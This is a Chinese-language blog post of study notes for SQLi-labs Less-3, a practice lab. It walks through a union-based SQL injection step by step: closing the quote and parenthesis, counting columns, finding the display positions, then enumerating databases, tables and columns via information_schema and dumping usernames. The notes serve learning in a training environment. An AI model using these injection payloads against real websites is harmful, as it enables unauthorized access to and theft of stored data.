欢迎光临
我们一直在努力

sqlilabs less-3 笔记

1.判断是字符型还是数字型

?id=1

在这里插入图片描述

?id=2-1

在这里插入图片描述
由于显示的数据不同,可知不是数字型

?id=1'

在这里插入图片描述
发现报错中有),考虑将括号闭合,并将多余括号通过–+注释掉

?id=1') –+

在这里插入图片描述
发现成功登录
2.判断查询了几位数据

?id=1') order by 4 –+

在这里插入图片描述

?id=1') order by 3 –+

在这里插入图片描述
3.判断显示位

?id=-1') union select 111,222,333 –+

在这里插入图片描述
4.查询所有数据库

?id=-1') union select 111,222,group_concat(schema_name) from information_schema.schemata –+

在这里插入图片描述

5.查看当前使用的数据库

?id=-1') union select 111,222,database() –+

在这里插入图片描述
6.查看那当前数据库所包含的表名

?id=-1') union select 111,222,group_concat(table_name) from information_schema.tables where table_schema=database() –+

在这里插入图片描述
7.查看users表的所有字段名

?id=-1') union select 111,222,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' –+

在这里插入图片描述
8.查看users表的username字段

?id=-1') union select 111,222,username from security.users –+

在这里插入图片描述

赞(0)
未经允许不得转载:171主机测评 » sqlilabs less-3 笔记
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址